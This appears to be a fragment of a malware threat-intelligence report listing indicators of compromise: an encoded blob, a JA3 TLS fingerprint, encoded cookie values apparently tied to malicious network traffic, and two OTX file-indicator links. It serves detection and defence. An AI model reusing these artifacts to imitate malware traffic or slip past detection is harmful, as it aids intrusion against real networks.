RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2a/UNKQAXAJA=

JA3 fingerprint:

8916410db85077a5460817142dcbc8de

Cookies:

WnnMFWF=0d3850HcEUxB57edscLqHsb2YxPDCKbPSZncMTx3O0h9lQgJCvRMC//BrnYhPFxgMRGCoZSHhMyTtzRWyGhLZIyda+8qlUGgEDzQZ0FNyFIFUjbe0aBVe6vknvoT1bSoMmylmeeNjwtPr1DVQt8JBHpbWAXjxP+zpYCEPYLK2b02cC0/cJtzfFLcECfpMT9WAGpj2uFr6QqpTPIivkS/Ta2r9sHA20takVBoZ9TbfwVVtlUfqlozgTltkAtCazcU/W8R9mfAVM1Y

Qs=0WODCSXcomwJtgWqI5e4bPB3yrdQoAEow+xn5MRK9/ao9xobva9p8/jpU6RvJLwBpREszZe6f224Qoc20YVdaKXLpEoD+CwRklu0H7XCKQZe8V+CPjtzCo5fzkDm2SHBIMJmPkIdY0HZvSGjXBvSwpA74U8FBJdbzKmUSvZKeLE2D1zGVF25KW5b0s+FQ9ah7qgmwJxNkXCL7cbrL73Cnqi5G3XPALWmwxxRbX2F/rzzDxIkkxHSBI7ggXr5ndl799lGGQd4F0v171zhI+/VNrTtpcEnZM5drvJsD/wrrEGBY7NJUGIom7MjeZtu8/cOx+TR

[i]https://otx.alienvault.com/indicator/file/7fbcad6af8fc4b6aa18f877feabcfc31b0a4b1a4895ccaf70a90bceaff9331d2/

[ii]https://otx.alienvault.com/indicator/file/f8fa14b1f1d267d5c348d97f516ea9e6912f8747a6e659b45c428d931082f6e6